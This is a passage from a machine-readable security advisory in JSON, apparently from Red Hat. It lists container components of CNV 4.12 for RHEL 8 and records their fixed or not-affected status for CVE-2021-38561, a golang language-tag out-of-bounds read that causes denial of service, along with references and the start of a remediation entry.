"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64"
},
"product_reference": "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64"
},
"product_reference": "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64"
},
"product_reference": "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
},
"product_reference": "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64"
},
"product_reference": "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64"
},
"product_reference": "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64"
},
"product_reference": "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64"
},
"product_reference": "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64"
},
"product_reference": "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64"
},
"product_reference": "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
},
"product_reference": "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64"
},
"product_reference": "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64 as a component of CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
},
"product_reference": "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64",
"relates_to_product_reference": "8Base-CNV-4.12"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-38561",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2022-06-23T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2100495"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. The language package for go language can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to crash, leading to a denial of service of the affected component.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: out-of-bounds read in golang.org/x/text/language leads to DoS",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw may be triggered only by accepting untrusted user input to the vulnerable golang\u0027s library. The overall DoS attack vector depends directly on how the library\u0027s input is exposed by the consuming application, thus Red Hat rates impact as Moderate.\n\nIn Red Hat Advanced Cluster Management for Kubernetes (RHACM) 2.5 version, the registration-operator, lighthouse-coredns, lighthouse-agent, gatekeeper-operator, and discovery-operator components are affected by this flaw, but the rest of the components are using an already patched version and are unaffected. For 2.4 and previous versions of Red Hat Advanced Cluster Management for Kubernetes (RHACM), most of the components are affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-38561"
},
{
"category": "external",
"summary": "RHBZ#2100495",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100495"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-38561",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38561"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2021-0113",
"url": "https://pkg.go.dev/vuln/GO-2021-0113"
}
],
"release_date": "2021-08-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
